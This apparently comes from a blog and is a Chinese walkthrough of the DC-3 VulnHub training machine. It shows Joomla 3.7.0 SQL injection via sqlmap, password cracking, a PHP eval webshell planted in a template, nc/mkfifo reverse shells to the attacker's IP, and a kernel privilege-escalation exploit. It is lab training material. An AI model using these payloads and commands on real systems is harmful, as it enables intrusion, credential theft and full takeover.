DC-3靶机详细过程

一,环境搭建

我们需要一台kali,一台dc-3靶机

 靶机DC-3下载地址:

 https : //download.vulnhub.com/dc/DC-3.zip

将靶机DC-3与Kali都以NAT模式连接到网络

DC-3需要多修改一些东西 点击CD/DVD 在点击高级,把IDE里面的内容改成IDE 0:0 点击确定。

都完成后开启KALI与DC-3

21c3a5cffb3e4027ba6568ee73733014.png

二、渗透靶场

查看靶场IP 输入ifconfig点击回车可以看到自己的IP

7af4ae2e130c4dd3a18f22bbb2dcc700.png

  1. 目标搭建的靶场,靶场IP为:192.168.186.0/24
  2. 1.信息收集 

查看本机IP和目标靶机ip

使用nmap扫描工具 输入nmap -sP 192.168.186.0/24网段,查找存活主机

扫描到DC-3靶机的IP地址为:192.168.186.131

kali的IP地址为:192.168.186.128

34f5a68d667745d4a569798c28c7c600.png

192.168.186.1 vm8网卡

192.168.186.2 网关

192.168.186.131 靶机

192.168.186.254 DHCP服务器

192.168.186.128 kali本机

2.探端口以及服务

输入nmap  -A  -p- -v 192.168.186.131

c6fb103cd9a347bcba76ce82d33cfaeb.png

可以看到80端口是开放的,存在web服务,Apache/2.4.18

3.网页信息探测

使用火狐打开网页 输入靶机IP地址 访问网址http://192.168.186.131

3478787aa011471b9f34a6ae5eaec61c.png

页面显示必须获得权限

4.joomScan扫描

这里介绍一个新工具joomscan,

joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具,输入apt install joomscan进行安装,选择y安装

ab20b38ba21d4b2ab1e7fec1e8b8dce2.png

5.漏洞查找

joomscan

输入 joomscan --url http://192.168.186.131

0f7cee9ebccb4591b1626fe0e778a27f.png

得到joomla版本信息   版本为3.7.0 也得到了网站后台地址

 http://192.168.186.131/administrator/

在火狐页面搜索得到的后台地址 

aa42ffc430e64f068d430ce65c851df7.png

6.利用nikto扫描获取后台地址

Nikto可以扫描指定主机的WEB类型、主机名、指定目录、特定CGI漏洞、返回主机允许的 http模式等。

输入nikto --url http://192.168.186.131/

8d46af08e59a4b87ad288bb3ba9f6962.png

    searchsploit

前面知道joomla,版本为3.7.0

使用searchsploit检查到有对应的漏洞

输入searchsploit joomla 3.7.0

587aef8669b74f1f94e57ae5a4ad08d6.png

我们发现有一个SQL注入,还存在一个XSS

我们可以看一下这个漏洞的提示信息

输入 searchsploit -m 42033.txt

62e4f3bf218d4fbf948bdbadd29f69a8.png

输入cat 42033.txt   信息如图所示

1e37b3f6c44242e6ae9eb940ae2debdf.png

把localhost修改为我们的靶机IP,到火狐页面去访问

http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%22

看到提示: 您的SQL语法有错误;说明进行了拼接,存在SQL注入

21ea967ec61342e6b632a31e85f1e5aa.png

7.漏洞利用

sqlmap

1.跑出所有数据库

输入sqlmap -u 

“http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”--risk=3 --level=5 --random-agent --dbs -p list[fullordering] –batch(注:双引号里的内容是火狐搜索栏里的内容)

09482c0f08f246dead95da1118d3177d.png

跑出来的数据库如下图:

b0848b60bef5416e9f8c3bf500857803.png

2.获取当前数据库的名字joomladb

输入sqlmap -u 

“http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml”--risk=3 --level=5 --random-agent --dbs -p list[fullordering]  --current-db –batch

dc9975200fbb4ae2ae7d4aecd662f42c.png

3.获取joomladb的users表

输入 sqlmap -u

"http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables --batch

2068d77e08c346a689edaccd4b084f3e.png

我们需要关注的是#__users这张表

4.获取joomladb的users表的字段名

sqlmap -u

"http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns

第一个选项是y

75ee1934b01e426fa31e36e0d93dfa87.png

第二个输入y

1ab2bb35562a41ee9539c88ba684f81c.png

第三个随便输入

8e1fa9d0ad274dd0839dc97b9c351006.png

第四个输入10

7bbdf2fcf3ef4fa09ca859c7f7409576.png成功跑出六个字段

335bd100ff044b9f88c4a6b9dec9f9d3.png

5.获取目标字段username和password

sqlmap -u "http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 -p list[fullordering] -D "joomladb" --tables -T "#__users" --columns -C "username,password" --dump --batch

获得一个用户名和加密的密码 结果如下图:

6a26cca499f54f28b67d77504b23aef5.png

John

利用john爆破密码snoopy

先创建一个1.txt,把加密的密码字段写入

输入echo ‘$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu’ > 1.txt  在输入cat 1.txt 就写进去了

a2426460423f4d4eb5c3c414826a5a09.png7.使用john破解出admin密码

输入John 1.txt    如图所知密码是snoopy

91f7a67470934aff8fa9555ccee8ea74.png

8.利用获取到的账号密码进行登录

在火狐网页搜索上输入http://192.168.186.131/administrator/ 出现登录页面 

账号是admin 密码是snoopy

cfb60bb64a8e4e07a96ee8b3c11b70b9.png

8.上传webshell

点击Extensions,然后弹出一个框,滑倒倒数第二个,点击最后一个。

48107cbdafa44f149f0972ee34e39759.png

进入页面,再点击Beez3 Details and Files

426e803f0d9f41789d011714935bb4f2.png

然后点击页面中的new files

f8ce1acc1cc34c2ba3eae2f3b6a02224.png

点击到这里发现可以上传文件,我们先要找到当前文件所在的目录:红色框住的复制

c4f587fdc0e343f88376d78f239c71a0.png

火狐上输入  http://192.168.186.131/templates/beez3/html/(粘贴刚刚复制的)点击回车显示目录

bcac22b8dab14f86a1b13d7662afc0f6.png

回到刚才的页面 点击new file
在点击html 旁边有两个小框创建一个php文件,名字叫做shell 点击create创建成功

255e4f7e5c1d4bd1aff6423b6dabeded.png

创建成功后,会跳到编辑页面,然后我们输入php一句话,点击左上角绿色的save进行保存

<?php

echo ("密码是a");

@eval($_REQUEST [a]);

?>

91d9848696524203ad265f1099399396.png

在火狐上再次访问http://192.168.186.131/templates/beez3/html/
会发现多了一个shell.php文件,我们访问一下

4934c6ae8d0a4e2a888931cc5de77feb.png

访问webshell,得到我们设置的会先内容,文件上传成功

http://192.168.186.131/templates/beez3/html/shell.php

06a1eb55392c4cfaa9db4cab241ac0d6.png

    

9.蚁剑

管理webshell

    打开蚁剑右键添加数据,地址填写http://192.168.186.131/templates/beez3/html/shell.php

密码填写 a 然后点击测试链接 右下角会显示连接成功

93a8fd980438469f9d5e3a4241405696.png

点击添加 在刚刚添加的数据上右键进入虚拟终端执行whoami查询我权限,是www-data权限

c6313ce0fe064133b2af9643674d1588.png

反弹shell到kali

输入nc -lvvp 1234

bbfe5ecea9ed4a4fb04b6c29abb2f931.png

靶机连接  输入

nc -e /bin/bash 192.168.186.128 1234

页面显示-e参数不可用

824208631b3c40499a9194ebc3da49cd.png

使用如下目录连接

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.186.128 1234 >/tmp/f

9f82b5cd163740928cdadab45cd7bd5e.png

a777999dc78f4a5aa837f0af66df4ecf.png

交互式shell

 常用的就是python创建交互式shell

 接着输入     python3 -c 'import pty; pty.spawn("/bin/bash")'  点击回车,在输入ls

e85b83400e864fbdaebee503b21d594b.png

10.使用辅助脚本发现提权漏洞

下载辅助脚本Linux-Exploit-Suggester.sh

    下载地址:

https://github.com/mzet-/linux-exploit-suggester

上传脚本,直接在蚁剑里上传,点击右键,选择上传文件,选择刚刚下好的脚本,点击打开上传成功

              724420fbe039412ab7d5b286dc53dba1.png

8fa6d06a13744195a3fec1c350be167c.png0b65b6ff2f9a425e839de8de1be57947.png

输入ls点击回车,发现漏洞   ls -l linux-exploit-suggester.sh

aa019b8a0ed64ee0948914d263549ff1.png

发现没有执行权限,我们给他加个执行文件

输入 chmod +x linux-exploit-suggester.sh

880f8e535f8d41cebe8abe15be0aa780.png

执行脚本      输入./linux-exploit-suggester.sh

发现很多可利用漏洞

7799c5096b99477bb31b189a7946f6fa.png3544b984a8f047c3a5cb7e48c7c9c012.png

11.提权

上面发现了很多漏洞,这里我们挑一个进行提权

挑选CVE-2016-4557

b2f5b63a9b694c408021498bddbab790.png

在图片里可以看到是一个39772的文件,由于给出的那个URL无法下载

去searchsploit里面去看看 

进入root里,输入searchsploit -m 39772.zip

b3644574e6fe4ffc8424952b02ba5f7b.png

1e9d4e5c41444ec684770931800e9ce7.png地址跟上面一样也是不能使用的,可以用下面这个地址直接下载。

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/blob/main/bin-sploits/39772.zip

下载好以后,点击蚁剑右键上传文件

b34ac061878a42fda3081fc155685c07.png

提权

    解压文件

输入ls 点击回车,在输入unzip 39772.zip

c89f237e292f4409a7275d121959a4c3.png

cd 39772

ls

f2fb90c56aa44e299be552a52c42192e.png

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

af6514da6c4d449b9435110f47a921ae.png

输入ls点击回车

输入./compile.sh 点击回车

输入./doubleput.c点击回车

输入ls点击回车

在输入./doubleput点击回车

执行完如下图,提权成功

4eba6a0eb6c84c8c897ddf08d310e898.png

获得root权限

输入whoami点击回车如下图

a3936c6c141f48ddaec864fae0a81703.png

12.发现the-flag.txt

输入cd /root

ls

cat the-flag.txt

97cd3343046840e482d213d89b6637ab.png

完成!

 

 

 

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值